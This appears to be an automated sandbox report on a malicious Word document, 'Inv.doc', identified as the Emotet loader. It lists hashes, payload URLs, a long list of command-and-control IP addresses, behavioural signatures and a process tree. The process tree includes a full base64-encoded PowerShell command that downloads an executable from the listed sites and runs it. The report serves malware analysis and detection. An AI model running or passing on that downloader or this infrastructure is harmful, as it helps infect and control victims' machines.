Analysis
-
max time kernel
135s -
max time network
134s -
platform
windows10_x64 -
resource
win10 -
submitted
31-07-2020 20:00
Static task
static1
Behavioral task
behavioral1
Sample
Inv.doc
Resource
win7
General
-
Target
Inv.doc
-
Size
170KB
-
MD5
d73a0e6175f48f880b632db663122763
-
SHA1
81946bbfea207753b2a434e2bdb7b2600ffc52aa
-
SHA256
b685b9baa5ed208c142e70cf07f7dd97d78ae5de3104da2a31c9f2278d4c6bd5
-
SHA512
a420c59fa4d3d23a8d48e56a192ef6f52b7faec47260883374d6ee37f0c3843bb2fce27625e9557f17fb033e0b84e2a84b1cb930f869342d5cc4d4e6def6b68f
Malware Config
Extracted
https://moshauer.de/B9kxs4x8n6272826/
http://geted.de/wwvv2/sTZFOgzh/
http://suhailacademy.com/wp-admin/oSHA/
http://smashingcake.com/blog/HNpury/
https://taolodge.com/pz/YbU2chs1980/
Extracted
emotet
187.64.128.197:80
198.57.203.63:8080
163.172.107.70:8080
212.112.113.235:80
157.7.164.178:8081
181.167.35.84:80
212.156.133.218:80
185.142.236.163:443
181.143.101.19:8080
75.127.14.170:8080
115.165.3.213:80
190.55.233.156:80
139.59.12.63:8080
144.139.91.187:80
37.70.131.107:80
181.113.229.139:443
41.185.29.128:8080
177.37.81.212:443
5.79.70.250:8080
78.188.170.128:80
190.111.215.4:8080
50.116.78.109:8080
75.139.38.211:80
140.207.113.106:443
192.241.220.183:8080
192.210.217.94:8080
81.17.93.134:80
181.164.110.7:80
190.164.75.175:80
201.214.108.231:80
94.96.60.191:80
192.163.221.191:8080
91.83.93.103:443
51.38.201.19:7080
24.157.25.203:80
81.214.253.80:443
87.106.231.60:8080
37.46.129.215:8080
195.201.56.70:8080
201.235.10.215:80
107.161.30.122:8080
113.160.180.109:80
87.252.100.28:80
115.79.195.246:80
113.161.148.81:80
74.208.173.91:8080
46.105.131.68:8080
172.105.78.244:8080
189.146.1.78:443
216.75.37.196:8080
203.153.216.182:7080
153.220.182.49:80
181.134.9.162:80
178.33.167.120:8080
46.49.124.53:80
143.95.101.72:8080
77.74.78.80:443
203.153.216.178:7080
179.5.118.12:80
24.232.36.99:80
177.144.130.105:443
46.32.229.152:8080
89.108.158.234:8080
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 384 WINWORD.EXE 384 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1000 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
432.exeiasads.exepid process 3972 432.exe 472 iasads.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
432.exedescription pid process target process PID 3972 wrote to memory of 472 3972 432.exe iasads.exe PID 3972 wrote to memory of 472 3972 432.exe iasads.exe PID 3972 wrote to memory of 472 3972 432.exe iasads.exe -
Drops file in System32 directory 1 IoCs
Processes:
432.exedescription ioc process File opened for modification C:\Windows\SysWOW64\ir50_qcoriginal\iasads.exe 432.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE432.exeiasads.exepid process 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 384 WINWORD.EXE 3972 432.exe 472 iasads.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1000 3816 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powersheLL.exeiasads.exepid process 1000 powersheLL.exe 1000 powersheLL.exe 1000 powersheLL.exe 472 iasads.exe 472 iasads.exe 472 iasads.exe 472 iasads.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 9 1000 powersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/3972-12-0x00000000020E0000-0x00000000020EC000-memory.dmp emotet behavioral2/memory/3972-12-0x00000000020E0000-0x00000000020EC000-memory.dmp emotet behavioral2/memory/472-15-0x00000000004E0000-0x00000000004EC000-memory.dmp emotet behavioral2/memory/472-15-0x00000000004E0000-0x00000000004EC000-memory.dmp emotet
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inv.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABSAEoAUwBYAEQAdgBsAGUAPQAnAEEAVABOAE4ATQBhAHAAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAUgBJAGAAVABgAHkAYABwAHIATwBUAE8AQwBPAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABFAEIARwBZAFUAbgBkAGEAIAA9ACAAJwA0ADMAMgAnADsAJABKAEwARgBPAEQAeABrAGUAPQAnAFUAUwBIAEoAQQBtAG8AawAnADsAJABRAEcAUABEAEkAagBuAGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAQgBHAFkAVQBuAGQAYQArACcALgBlAHgAZQAnADsAJABTAEQAVQBSAEQAdABtAG4APQAnAFEAUABHAEoAVgBjAG0AcgAnADsAJABHAE8AUgBTAFQAbgBwAHIAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAYwBsAGkAZQBOAFQAOwAkAE4AVABPAEMASwBxAHAAZwA9ACcAaAB0AHQAcABzADoALwAvAG0AbwBzAGgAYQB1AGUAcgAuAGQAZQAvAEIAOQBrAHgAcwA0AHgAOABuADYAMgA3ADIAOAAyADYALwAqAGgAdAB0AHAAOgAvAC8AZwBlAHQAZQBkAC4AZABlAC8AdwB3AHYAdgAyAC8AcwBUAFoARgBPAGcAegBoAC8AKgBoAHQAdABwADoALwAvAHMAdQBoAGEAaQBsAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8AUwBIAEEALwAqAGgAdAB0AHAAOgAvAC8AcwBtAGEAcwBoAGkAbgBnAGMAYQBrAGUALgBjAG8AbQAvAGIAbABvAGcALwBIAE4AcAB1AHIAeQAvACoAaAB0AHQAcABzADoALwAvAHQAYQBvAGwAbwBkAGcAZQAuAGMAbwBtAC8AcAB6AC8AWQBiAFUAMgBjAGgAcwAxADkAOAAwAC8AJwAuACIAcwBwAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABNAFUATwBBAFQAcgByAGsAPQAnAFQASgBOAEIAWABwAGoAZwAnADsAZgBvAHIAZQBhAGMAaAAoACQAVABNAFYATgBCAGQAZgB0ACAAaQBuACAAJABOAFQATwBDAEsAcQBwAGcAKQB7AHQAcgB5AHsAJABHAE8AUgBTAFQAbgBwAHIALgAiAGQATwBXAG4AbABgAE8AYABBAGQAZgBpAGAATABlACIAKAAkAFQATQBWAE4AQgBkAGYAdAAsACAAJABRAEcAUABEAEkAagBuAGgAKQA7ACQAVwBSAEkATABDAHAAcwB0AD0AJwBPAEwAWABFAFcAagBnAGMAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABRAEcAUABEAEkAagBuAGgAKQAuACIATABgAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA0ADUAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAGAAZQBBAGAAVABlACIAKAAkAFEARwBQAEQASQBqAG4AaAApADsAJABSAEsAQwBBAFQAdgB0AGQAPQAnAFAAUgBSAFoATwB1AHEAegAnADsAYgByAGUAYQBrADsAJABBAFMAWQBIAFoAYwBkAHkAPQAnAE8ATQBFAFUAVgB6AHMAbwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAFIATwBRAEkAbQBiAGQAPQAnAFcATQBJAEoARwBrAGkAYgAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
-
C:\Users\Admin\432.exeC:\Users\Admin\432.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\ir50_qcoriginal\iasads.exe"C:\Windows\SysWOW64\ir50_qcoriginal\iasads.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\432.exe
-
C:\Users\Admin\432.exe
-
C:\Windows\SysWOW64\ir50_qcoriginal\iasads.exe
-
memory/384-8-0x0000017C18386000-0x0000017C1839A000-memory.dmpFilesize
80KB
-
memory/384-4-0x0000017C182C2000-0x0000017C182C7000-memory.dmpFilesize
20KB
-
memory/384-5-0x0000017C15C9A000-0x0000017C15C9F000-memory.dmpFilesize
20KB
-
memory/384-6-0x0000017C18386000-0x0000017C1839A000-memory.dmpFilesize
80KB
-
memory/384-7-0x0000017C18386000-0x0000017C1839A000-memory.dmpFilesize
80KB
-
memory/384-0-0x0000017C182C2000-0x0000017C182C7000-memory.dmpFilesize
20KB
-
memory/384-9-0x0000017C18386000-0x0000017C1839A000-memory.dmpFilesize
80KB
-
memory/384-3-0x0000017C182B1000-0x0000017C182C2000-memory.dmpFilesize
68KB
-
memory/384-2-0x0000017C182C2000-0x0000017C182C7000-memory.dmpFilesize
20KB
-
memory/384-1-0x0000017C182C2000-0x0000017C182C7000-memory.dmpFilesize
20KB
-
memory/472-13-0x0000000000000000-mapping.dmp
-
memory/472-15-0x00000000004E0000-0x00000000004EC000-memory.dmpFilesize
48KB
-
memory/3972-12-0x00000000020E0000-0x00000000020EC000-memory.dmpFilesize
48KB